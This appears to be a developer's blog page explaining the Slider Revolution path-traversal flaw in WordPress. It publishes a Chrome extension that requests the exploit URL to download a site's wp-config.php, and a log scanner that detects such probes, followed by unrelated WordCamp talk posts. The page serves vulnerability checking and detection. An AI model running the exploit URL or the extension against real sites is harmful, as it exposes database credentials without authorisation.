History

While the Slider Revolution exploit is, at this point, fairly old news, it seems that not everyone got the memo. In a recent post, Wordfence claims that the recent Panama Papers fiasco may have begun with a breach of the Mossack Fonseca web server through this exploit.

The agency where I work applied fixes to all of our client sites as soon as the initial news hit, but I have a college friend who recently inherited a number of WordPress websites at his job. After reading the Wordfence article, he realized he didn’t know if any of his new clients had versions of the plugin that would still be vulnerable. Of course the simple answer is “go update all of your plugins”, but since the plugin is baked into the theme in so many cases (and how many made-by-another-developer sites do you have that are all properly child-themed and easy to update?) he couldn’t simply go to his Plugins page on every site to download the new version.

The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically download the site’s wp-config file.

`/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php`

Solution

What I did to help him out was write a quick Chrome Extension that allowed him to browse to his client sites, click the button, and the extension would attempt to download the `wp-config.php` file from the server. If he got the file, he knew he had a problematic copy of Slider Revolution. If the site responded in any other way, he was likely fine.

The extension was put together in about 15 minutes, and is the first Chrome Extension I’ve written, so it isn’t very fancy. I could have done something other than trying to download the file in the browser, so that it could display “success” or “failure” when trying to exploit the site. It also assumes that WordPress lives at the root of the website, since the extension will attempt to access `/wp-admin/` at the root of the domain. If a site has a vulnerable plugin installed but, for example, contains the WordPress installation in the `/wordpress/` directory, this extension will not find the exploitable path.
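The same request can also be looked for from the server side, which does not depend on where WordPress is installed. The following is an added example, not part of the original extension: it scans access-log lines for `revslider_show_image` requests whose `img` value is not a plain image file. It assumes the combined log format, the function names are hypothetical, the log lines are constructed samples, and treating any non-image `img` value as suspicious is a heuristic.

```javascript
// Added example (not from the original extension). Assumes combined log format;
// every line in SAMPLE_LOG is a constructed sample, not real traffic.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Apr/2016:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3521 "-" "curl/7.47.0"',
  '203.0.113.7 - - [10/Apr/2016:10:01:05 +0000] "GET /wordpress/wp-admin/admin-ajax.php?img=..%2Fwp-config.php&action=revslider_show_image HTTP/1.1" 200 3490 "-" "curl/7.47.0"',
  '198.51.100.4 - - [10/Apr/2016:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2016/04/slide1.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Apr/2016:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252Fwp-config.php HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [10/Apr/2016:10:04:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
];
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;
const IMAGE_EXT = /\.(?:jpe?g|png|gif)$/i;

// Decode repeatedly so double-encoded separators (%252F) are normalised too.
function fullyDecode(value) {
  let current = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

function classifyLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, , target, status] = m;
  const qIndex = target.indexOf('?');
  if (qIndex === -1) return null;
  const path = target.slice(0, qIndex);
  // Match admin-ajax.php under any prefix, so subdirectory installs are covered.
  if (!/\/wp-admin\/admin-ajax\.php$/.test(path)) return null;
  const params = new URLSearchParams(target.slice(qIndex + 1));
  if (params.get('action') !== 'revslider_show_image') return null;
  const img = fullyDecode(params.get('img') || '');
  const traversal = img.split(/[\\/]/).includes('..');
  const suspicious = traversal || !IMAGE_EXT.test(img);
  // served is true when a suspicious request was answered with a 200 status.
  const served = suspicious && status === '200';
  return { ip, time, path, img, suspicious, served };
}

function findRevsliderProbes(lines) {
  return lines.map(classifyLine).filter((r) => r && r.suspicious);
}

console.log(findRevsliderProbes(SAMPLE_LOG));
```

Entries with `served: true` are the ones to follow up first: a 200 response to such a request on a site that bundles the plugin is a reason to update it and rotate the credentials stored in `wp-config.php`.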

Download

Click here to download the extension now

I’m distributing the extension in its “unpacked” state, so that people can review it before use. Since the zip file contains a folder with all of the raw files, you will need to enable Developer Mode in Chrome in order to load the extension if you’d like to use it yourself. Click here for instructions on how to load an unpacked extension in Google Chrome

NOTE: Obviously you use this code at your own risk and for your own purposes. You alone are responsible for your own actions. I cannot be held responsible for anything you do with this extension, or the code/information provided on this page.

Source

You may also view the source code of the `manifest.json` and `background.js` files below, which are the only pieces of code in the whole extension. Enjoy!

`manifest.json`:

```json
{
  "manifest_version": 2,

  "name": "Revolution Slider Checker",
  "description": "This extension will check the current website to see if their Revolution Slider is vulnerable to the known exploit that allows you to download the wp-config.php file",
  "version": "1.0",

  "browser_action": {
    "default_icon": "icon.png",
    "default_title": "Click here to check"
  },
  "background": {
    "scripts": ["background.js"]
  },
  "permissions": [
    "activeTab"
  ]
}
```
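`background.js`:

```javascript
// More info on the Slider Revolution exploit
// https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

chrome.browserAction.onClicked.addListener(function(tab) {

	// Extract scheme://host[:port] from the current tab's URL.
	// regex taken from http://stackoverflow.com/questions/3689423/google-chrome-plugin-how-to-get-domain-from-url-tab-url
	var match = (tab.url || '').match(/^[\w-]+:\/{2,}\[?[\w\.:-]+\]?(?::[0-9]*)?/);
	if (!match) {
		return;	// no parseable origin (e.g. a blank tab), so there is nothing to check
	}
	var origin = match[0];

	// Point the tab at the test URL; this assumes WordPress lives at the root of the origin.
	chrome.tabs.update(tab.id, {
		url: origin + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
	});

});
```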

 

If you’re here looking for the slides from my i18n / l10n presentation from WordCamp Rhode Island 2015, you’ve come to the right place!

If you attended my presentation, I hope you enjoyed it and learned something about i18n today! If you didn’t attend, I hope these slides are still helpful to you.

If you still have any questions, please get in touch with me! I’d be happy to help answer any questions you have.

Click here to view the presentation on Speaker Deck

Very excited to hear, and announce, that I’ve been selected to speak at WordCamp Rhode Island at the end of the month!

I’ll be speaking at the 4:30 time slot on i18n/l10n, aka: Internationalization and Localization. I’ve used many of the gettext functions in my own code before, but haven’t touched too much on the less-common functions and I felt that it was an important enough topic that there was value in teaching it to people who may be writing their own plugins or themes and didn’t currently use the functions. Plus, I know I’ll learn a ton putting together the presentation! You always learn a topic best when putting material together so that you can teach it to others.

Saturday, 9/26 @ 4:30pm ET on the NEIT campus in East Greenwich, RI. Maybe I’ll see you there!